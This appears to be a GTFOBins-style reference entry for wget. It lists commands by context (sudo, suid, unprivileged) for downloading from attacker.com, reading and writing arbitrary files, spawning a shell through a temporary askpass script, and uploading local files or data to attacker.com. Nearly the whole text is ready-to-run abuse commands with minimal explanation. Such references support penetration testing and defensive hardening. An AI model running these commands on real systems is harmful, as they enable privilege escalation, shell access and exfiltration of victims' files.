🐚 GTFOBins / wget

wget

Download

Context: sudo, suid, unprivileged

wget http://attacker.com/path/to/input-file -O /path/to/output-file

File Read

Context: sudo, suid, unprivileged

wget -i /path/to/input-file

File Write

Context: sudo, suid, unprivileged

wget -i /path/to/input-file -o /path/to/output-file

Shell

Context: sudo, suid, unprivileged

echo -e '#!/bin/sh\n/bin/sh 1>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
wget --use-askpass=/path/to/temp-file 0

Upload

Context: sudo, suid, unprivileged

wget --post-file=/path/to/input-file http://attacker.com

Context: sudo, suid, unprivileged

wget --post-data=DATA http://attacker.com